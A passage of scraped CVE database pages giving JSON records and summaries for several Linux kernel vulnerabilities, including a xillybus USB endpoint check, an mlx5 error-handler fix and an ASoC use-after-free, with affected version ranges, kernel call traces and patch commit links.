        "providerMetadata": {
          "dateUpdated": "2024-09-29T15:50:54.451Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:15:18.241Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/char/xillybus/xillyusb.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "25ee8b2908200fc862c0434e5ad483817d50ceda",
              "status": "affected",
              "version": "a53d1202aef122894b6e46116a92174a9123db5d",
              "versionType": "git"
            },
            {
              "lessThan": "4267131278f5cc98f8db31d035d64bdbbfe18658",
              "status": "affected",
              "version": "a53d1202aef122894b6e46116a92174a9123db5d",
              "versionType": "git"
            },
            {
              "lessThan": "5cff754692ad45d5086b75fef8cc3a99c30a1005",
              "status": "affected",
              "version": "a53d1202aef122894b6e46116a92174a9123db5d",
              "versionType": "git"
            },
            {
              "lessThan": "1371d32b95972d39c1e6e4bae8b6d0df1b573731",
              "status": "affected",
              "version": "a53d1202aef122894b6e46116a92174a9123db5d",
              "versionType": "git"
            },
            {
              "lessThan": "2374bf7558de915edc6ec8cb10ec3291dfab9594",
              "status": "affected",
              "version": "a53d1202aef122894b6e46116a92174a9123db5d",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/char/xillybus/xillyusb.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.14"
            },
            {
              "lessThan": "5.14",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.166",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.107",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.48",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.7",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.166",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.107",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.48",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.7",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nchar: xillybus: Check USB endpoints when probing device\n\nEnsure, as the driver probes the device, that all endpoints that the\ndriver may attempt to access exist and are of the correct type.\n\nAll XillyUSB devices must have a Bulk IN and Bulk OUT endpoint at\naddress 1. This is verified in xillyusb_setup_base_eps().\n\nOn top of that, a XillyUSB device may have additional Bulk OUT\nendpoints. The information about these endpoints\u0027 addresses is deduced\nfrom a data structure (the IDT) that the driver fetches from the device\nwhile probing it. These endpoints are checked in setup_channels().\n\nA XillyUSB device never has more than one IN endpoint, as all data\ntowards the host is multiplexed in this single Bulk IN endpoint. This is\nwhy setup_channels() only checks OUT endpoints."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:30:58.721Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/25ee8b2908200fc862c0434e5ad483817d50ceda"
        },
        {
          "url": "https://git.kernel.org/stable/c/4267131278f5cc98f8db31d035d64bdbbfe18658"
        },
        {
          "url": "https://git.kernel.org/stable/c/5cff754692ad45d5086b75fef8cc3a99c30a1005"
        },
        {
          "url": "https://git.kernel.org/stable/c/1371d32b95972d39c1e6e4bae8b6d0df1b573731"
        },
        {
          "url": "https://git.kernel.org/stable/c/2374bf7558de915edc6ec8cb10ec3291dfab9594"
        }
      ],
      "title": "char: xillybus: Check USB endpoints when probing device",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-45011",
    "datePublished": "2024-09-11T15:13:48.969Z",
    "dateReserved": "2024-08-21T05:34:56.681Z",
    "dateUpdated": "2025-11-03T22:15:18.241Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2021-47212 (GCVE-0-2021-47212)

Vulnerability from cvelistv5 – Published: 2024-04-10 19:01 – Updated: 2025-05-04 07:06

Title

net/mlx5: Update error handler for UCTX and UMEM

Summary

In the Linux kernel, the following vulnerability has been resolved: net/mlx5: Update error handler for UCTX and UMEM In the fast unload flow, the device state is set to internal error, which indicates that the driver started the destroy process. In this case, when a destroy command is being executed, it should return MLX5_CMD_STAT_OK. Fix MLX5_CMD_OP_DESTROY_UCTX and MLX5_CMD_OP_DESTROY_UMEM to return OK instead of EIO. This fixes a call trace in the umem release process - [ 2633.536695] Call Trace: [ 2633.537518] ib_uverbs_remove_one+0xc3/0x140 [ib_uverbs] [ 2633.538596] remove_client_context+0x8b/0xd0 [ib_core] [ 2633.539641] disable_device+0x8c/0x130 [ib_core] [ 2633.540615] __ib_unregister_device+0x35/0xa0 [ib_core] [ 2633.541640] ib_unregister_device+0x21/0x30 [ib_core] [ 2633.542663] __mlx5_ib_remove+0x38/0x90 [mlx5_ib] [ 2633.543640] auxiliary_bus_remove+0x1e/0x30 [auxiliary] [ 2633.544661] device_release_driver_internal+0x103/0x1f0 [ 2633.545679] bus_remove_device+0xf7/0x170 [ 2633.546640] device_del+0x181/0x410 [ 2633.547606] mlx5_rescan_drivers_locked.part.10+0x63/0x160 [mlx5_core] [ 2633.548777] mlx5_unregister_device+0x27/0x40 [mlx5_core] [ 2633.549841] mlx5_uninit_one+0x21/0xc0 [mlx5_core] [ 2633.550864] remove_one+0x69/0xe0 [mlx5_core] [ 2633.551819] pci_device_remove+0x3b/0xc0 [ 2633.552731] device_release_driver_internal+0x103/0x1f0 [ 2633.553746] unbind_store+0xf6/0x130 [ 2633.554657] kernfs_fop_write+0x116/0x190 [ 2633.555567] vfs_write+0xa5/0x1a0 [ 2633.556407] ksys_write+0x4f/0xb0 [ 2633.557233] do_syscall_64+0x5b/0x1a0 [ 2633.558071] entry_SYSCALL_64_after_hwframe+0x65/0xca [ 2633.559018] RIP: 0033:0x7f9977132648 [ 2633.559821] Code: 89 02 48 c7 c0 ff ff ff ff eb b3 0f 1f 80 00 00 00 00 f3 0f 1e fa 48 8d 05 55 6f 2d 00 8b 00 85 c0 75 17 b8 01 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 58 c3 0f 1f 80 00 00 00 00 41 54 49 89 d4 55 [ 2633.562332] RSP: 002b:00007fffb1a83888 EFLAGS: 00000246 ORIG_RAX: 0000000000000001 [ 2633.563472] RAX: ffffffffffffffda RBX: 000000000000000c RCX: 00007f9977132648 [ 2633.564541] RDX: 000000000000000c RSI: 000055b90546e230 RDI: 0000000000000001 [ 2633.565596] RBP: 000055b90546e230 R08: 00007f9977406860 R09: 00007f9977a54740 [ 2633.566653] R10: 0000000000000000 R11: 0000000000000246 R12: 00007f99774056e0 [ 2633.567692] R13: 000000000000000c R14: 00007f9977400880 R15: 000000000000000c [ 2633.568725] ---[ end trace 10b4fe52945e544d ]---

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/a51a6da375d82aed5…
	https://git.kernel.org/stable/c/ba50cd9451f6c49cf…

Impacted products

Vendor

Product

Version

Linux

Affected: 6a6fabbfa3e8c656ff906ae999fb6856410fa4cd , < a51a6da375d82aed5c8f83abd13e7d060421bd48 (git)
Affected: 6a6fabbfa3e8c656ff906ae999fb6856410fa4cd , < ba50cd9451f6c49cf0841c0a4a146ff6a2822699 (git)

Linux

Affected: 5.2
Unaffected: 0 , < 5.2 (semver)
Unaffected: 5.15.5 , ≤ 5.15.* (semver)
Unaffected: 5.16 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2021-47212",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-17T18:03:48.572043Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-17T18:04:44.861Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-04T05:32:07.274Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a51a6da375d82aed5c8f83abd13e7d060421bd48"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ba50cd9451f6c49cf0841c0a4a146ff6a2822699"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/ethernet/mellanox/mlx5/core/cmd.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "a51a6da375d82aed5c8f83abd13e7d060421bd48",
              "status": "affected",
              "version": "6a6fabbfa3e8c656ff906ae999fb6856410fa4cd",
              "versionType": "git"
            },
            {
              "lessThan": "ba50cd9451f6c49cf0841c0a4a146ff6a2822699",
              "status": "affected",
              "version": "6a6fabbfa3e8c656ff906ae999fb6856410fa4cd",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/ethernet/mellanox/mlx5/core/cmd.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.2"
            },
            {
              "lessThan": "5.2",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.5",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "5.16",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.5",
                  "versionStartIncluding": "5.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.16",
                  "versionStartIncluding": "5.2",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5: Update error handler for UCTX and UMEM\n\nIn the fast unload flow, the device state is set to internal error,\nwhich indicates that the driver started the destroy process.\nIn this case, when a destroy command is being executed, it should return\nMLX5_CMD_STAT_OK.\nFix MLX5_CMD_OP_DESTROY_UCTX and MLX5_CMD_OP_DESTROY_UMEM to return OK\ninstead of EIO.\n\nThis fixes a call trace in the umem release process -\n[ 2633.536695] Call Trace:\n[ 2633.537518]  ib_uverbs_remove_one+0xc3/0x140 [ib_uverbs]\n[ 2633.538596]  remove_client_context+0x8b/0xd0 [ib_core]\n[ 2633.539641]  disable_device+0x8c/0x130 [ib_core]\n[ 2633.540615]  __ib_unregister_device+0x35/0xa0 [ib_core]\n[ 2633.541640]  ib_unregister_device+0x21/0x30 [ib_core]\n[ 2633.542663]  __mlx5_ib_remove+0x38/0x90 [mlx5_ib]\n[ 2633.543640]  auxiliary_bus_remove+0x1e/0x30 [auxiliary]\n[ 2633.544661]  device_release_driver_internal+0x103/0x1f0\n[ 2633.545679]  bus_remove_device+0xf7/0x170\n[ 2633.546640]  device_del+0x181/0x410\n[ 2633.547606]  mlx5_rescan_drivers_locked.part.10+0x63/0x160 [mlx5_core]\n[ 2633.548777]  mlx5_unregister_device+0x27/0x40 [mlx5_core]\n[ 2633.549841]  mlx5_uninit_one+0x21/0xc0 [mlx5_core]\n[ 2633.550864]  remove_one+0x69/0xe0 [mlx5_core]\n[ 2633.551819]  pci_device_remove+0x3b/0xc0\n[ 2633.552731]  device_release_driver_internal+0x103/0x1f0\n[ 2633.553746]  unbind_store+0xf6/0x130\n[ 2633.554657]  kernfs_fop_write+0x116/0x190\n[ 2633.555567]  vfs_write+0xa5/0x1a0\n[ 2633.556407]  ksys_write+0x4f/0xb0\n[ 2633.557233]  do_syscall_64+0x5b/0x1a0\n[ 2633.558071]  entry_SYSCALL_64_after_hwframe+0x65/0xca\n[ 2633.559018] RIP: 0033:0x7f9977132648\n[ 2633.559821] Code: 89 02 48 c7 c0 ff ff ff ff eb b3 0f 1f 80 00 00 00 00 f3 0f 1e fa 48 8d 05 55 6f 2d 00 8b 00 85 c0 75 17 b8 01 00 00 00 0f 05 \u003c48\u003e 3d 00 f0 ff ff 77 58 c3 0f 1f 80 00 00 00 00 41 54 49 89 d4 55\n[ 2633.562332] RSP: 002b:00007fffb1a83888 EFLAGS: 00000246 ORIG_RAX: 0000000000000001\n[ 2633.563472] RAX: ffffffffffffffda RBX: 000000000000000c RCX: 00007f9977132648\n[ 2633.564541] RDX: 000000000000000c RSI: 000055b90546e230 RDI: 0000000000000001\n[ 2633.565596] RBP: 000055b90546e230 R08: 00007f9977406860 R09: 00007f9977a54740\n[ 2633.566653] R10: 0000000000000000 R11: 0000000000000246 R12: 00007f99774056e0\n[ 2633.567692] R13: 000000000000000c R14: 00007f9977400880 R15: 000000000000000c\n[ 2633.568725] ---[ end trace 10b4fe52945e544d ]---"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T07:06:28.557Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/a51a6da375d82aed5c8f83abd13e7d060421bd48"
        },
        {
          "url": "https://git.kernel.org/stable/c/ba50cd9451f6c49cf0841c0a4a146ff6a2822699"
        }
      ],
      "title": "net/mlx5: Update error handler for UCTX and UMEM",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2021-47212",
    "datePublished": "2024-04-10T19:01:53.270Z",
    "dateReserved": "2024-04-10T18:59:19.527Z",
    "dateUpdated": "2025-05-04T07:06:28.557Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-46798 (GCVE-0-2024-46798)

Vulnerability from cvelistv5 – Published: 2024-09-18 07:12 – Updated: 2025-11-03 22:18

Title

ASoC: dapm: Fix UAF for snd_soc_pcm_runtime object

Summary

In the Linux kernel, the following vulnerability has been resolved: ASoC: dapm: Fix UAF for snd_soc_pcm_runtime object When using kernel with the following extra config, - CONFIG_KASAN=y - CONFIG_KASAN_GENERIC=y - CONFIG_KASAN_INLINE=y - CONFIG_KASAN_VMALLOC=y - CONFIG_FRAME_WARN=4096 kernel detects that snd_pcm_suspend_all() access a freed 'snd_soc_pcm_runtime' object when the system is suspended, which leads to a use-after-free bug: [ 52.047746] BUG: KASAN: use-after-free in snd_pcm_suspend_all+0x1a8/0x270 [ 52.047765] Read of size 1 at addr ffff0000b9434d50 by task systemd-sleep/2330 [ 52.047785] Call trace: [ 52.047787] dump_backtrace+0x0/0x3c0 [ 52.047794] show_stack+0x34/0x50 [ 52.047797] dump_stack_lvl+0x68/0x8c [ 52.047802] print_address_description.constprop.0+0x74/0x2c0 [ 52.047809] kasan_report+0x210/0x230 [ 52.047815] __asan_report_load1_noabort+0x3c/0x50 [ 52.047820] snd_pcm_suspend_all+0x1a8/0x270 [ 52.047824] snd_soc_suspend+0x19c/0x4e0 The snd_pcm_sync_stop() has a NULL check on 'substream->runtime' before making any access. So we need to always set 'substream->runtime' to NULL everytime we kfree() it.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/993b60c7f93fa1d8f…
	https://git.kernel.org/stable/c/8ca21e7a27c66b95a…
	https://git.kernel.org/stable/c/3033ed903b4f28b5e…
	https://git.kernel.org/stable/c/fe5046ca91d631ec4…
	https://git.kernel.org/stable/c/5d13afd021eb43868…
	https://git.kernel.org/stable/c/6a14fad8be178df6c…
	https://git.kernel.org/stable/c/b4a90b543d9f62d3a…

Impacted products

Vendor

Product

Version

Linux

Affected: a72706ed8208ac3f72d1c3ebbc6509e368b0dcb0 , < 993b60c7f93fa1d8ff296b58f646a867e945ae89 (git)
Affected: a72706ed8208ac3f72d1c3ebbc6509e368b0dcb0 , < 8ca21e7a27c66b95a4b215edc8e45e5d66679f9f (git)
Affected: a72706ed8208ac3f72d1c3ebbc6509e368b0dcb0 , < 3033ed903b4f28b5e1ab66042084fbc2c48f8624 (git)
Affected: a72706ed8208ac3f72d1c3ebbc6509e368b0dcb0 , < fe5046ca91d631ec432eee3bdb1f1c49b09c8b5e (git)
Affected: a72706ed8208ac3f72d1c3ebbc6509e368b0dcb0 , < 5d13afd021eb43868fe03cef6da34ad08831ad6d (git)
Affected: a72706ed8208ac3f72d1c3ebbc6509e368b0dcb0 , < 6a14fad8be178df6c4589667efec1789a3307b4e (git)
Affected: a72706ed8208ac3f72d1c3ebbc6509e368b0dcb0 , < b4a90b543d9f62d3ac34ec1ab97fc5334b048565 (git)

Linux

Affected: 5.4
Unaffected: 0 , < 5.4 (semver)
Unaffected: 5.4.284 , ≤ 5.4.* (semver)
Unaffected: 5.10.226 , ≤ 5.10.* (semver)
Unaffected: 5.15.167 , ≤ 5.15.* (semver)
Unaffected: 6.1.110 , ≤ 6.1.* (semver)
Unaffected: 6.6.51 , ≤ 6.6.* (semver)
Unaffected: 6.10.10 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-46798",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-29T14:22:12.387041Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-29T14:22:24.202Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:18:40.111Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/10/msg00003.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "sound/soc/soc-dapm.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "993b60c7f93fa1d8ff296b58f646a867e945ae89",
              "status": "affected",
              "version": "a72706ed8208ac3f72d1c3ebbc6509e368b0dcb0",
              "versionType": "git"
            },
            {
              "lessThan": "8ca21e7a27c66b95a4b215edc8e45e5d66679f9f",
              "status": "affected",
              "version": "a72706ed8208ac3f72d1c3ebbc6509e368b0dcb0",
              "versionType": "git"
            },
            {
              "lessThan": "3033ed903b4f28b5e1ab66042084fbc2c48f8624",
              "status": "affected",
              "version": "a72706ed8208ac3f72d1c3ebbc6509e368b0dcb0",
              "versionType": "git"
            },
            {
              "lessThan": "fe5046ca91d631ec432eee3bdb1f1c49b09c8b5e",
              "status": "affected",
              "version": "a72706ed8208ac3f72d1c3ebbc6509e368b0dcb0",
              "versionType": "git"
            },
            {
              "lessThan": "5d13afd021eb43868fe03cef6da34ad08831ad6d",
              "status": "affected",
              "version": "a72706ed8208ac3f72d1c3ebbc6509e368b0dcb0",
              "versionType": "git"
            },
            {
              "lessThan": "6a14fad8be178df6c4589667efec1789a3307b4e",
              "status": "affected",
              "version": "a72706ed8208ac3f72d1c3ebbc6509e368b0dcb0",
              "versionType": "git"
            },
            {
              "lessThan": "b4a90b543d9f62d3ac34ec1ab97fc5334b048565",
              "status": "affected",
              "version": "a72706ed8208ac3f72d1c3ebbc6509e368b0dcb0",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "sound/soc/soc-dapm.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.4"
            },
            {
              "lessThan": "5.4",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.284",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.226",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.167",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.110",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.51",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.10",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.284",
                  "versionStartIncluding": "5.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.226",
                  "versionStartIncluding": "5.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.167",
                  "versionStartIncluding": "5.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.110",
                  "versionStartIncluding": "5.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.51",
                  "versionStartIncluding": "5.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.10",
                  "versionStartIncluding": "5.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "5.4",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: dapm: Fix UAF for snd_soc_pcm_runtime object\n\nWhen using kernel with the following extra config,\n\n  - CONFIG_KASAN=y\n  - CONFIG_KASAN_GENERIC=y\n  - CONFIG_KASAN_INLINE=y\n  - CONFIG_KASAN_VMALLOC=y\n  - CONFIG_FRAME_WARN=4096\n\nkernel detects that snd_pcm_suspend_all() access a freed\n\u0027snd_soc_pcm_runtime\u0027 object when the system is suspended, which\nleads to a use-after-free bug:\n\n[   52.047746] BUG: KASAN: use-after-free in snd_pcm_suspend_all+0x1a8/0x270\n[   52.047765] Read of size 1 at addr ffff0000b9434d50 by task systemd-sleep/2330\n\n[   52.047785] Call trace:\n[   52.047787]  dump_backtrace+0x0/0x3c0\n[   52.047794]  show_stack+0x34/0x50\n[   52.047797]  dump_stack_lvl+0x68/0x8c\n[   52.047802]  print_address_description.constprop.0+0x74/0x2c0\n[   52.047809]  kasan_report+0x210/0x230\n[   52.047815]  __asan_report_load1_noabort+0x3c/0x50\n[   52.047820]  snd_pcm_suspend_all+0x1a8/0x270\n[   52.047824]  snd_soc_suspend+0x19c/0x4e0\n\nThe snd_pcm_sync_stop() has a NULL check on \u0027substream-\u003eruntime\u0027 before\nmaking any access. So we need to always set \u0027substream-\u003eruntime\u0027 to NULL\neverytime we kfree() it."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:34:34.568Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/993b60c7f93fa1d8ff296b58f646a867e945ae89"
        },
        {
          "url": "https://git.kernel.org/stable/c/8ca21e7a27c66b95a4b215edc8e45e5d66679f9f"
        },
        {
          "url": "https://git.kernel.org/stable/c/3033ed903b4f28b5e1ab66042084fbc2c48f8624"
        },
        {
          "url": "https://git.kernel.org/stable/c/fe5046ca91d631ec432eee3bdb1f1c49b09c8b5e"
        },
        {
          "url": "https://git.kernel.org/stable/c/5d13afd021eb43868fe03cef6da34ad08831ad6d"
        },
        {
          "url": "https://git.kernel.org/stable/c/6a14fad8be178df6c4589667efec1789a3307b4e"
        },
        {
          "url": "https://git.kernel.org/stable/c/b4a90b543d9f62d3ac34ec1ab97fc5334b048565"
        }
      ],
      "title": "ASoC: dapm: Fix UAF for snd_soc_pcm_runtime object",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-46798",
    "datePublished": "2024-09-18T07:12:52.628Z",
    "dateReserved": "2024-09-11T15:12:18.280Z",
    "dateUpdated": "2025-11-03T22:18:40.111Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-26787 (GCVE-0-2024-26787)

Vulnerability from cvelistv5 – Published: 2024-04-04 08:20 – Updated: 2025-05-04 08:56

Title

mmc: mmci: stm32: fix DMA API overlapping mappings warning

Summary

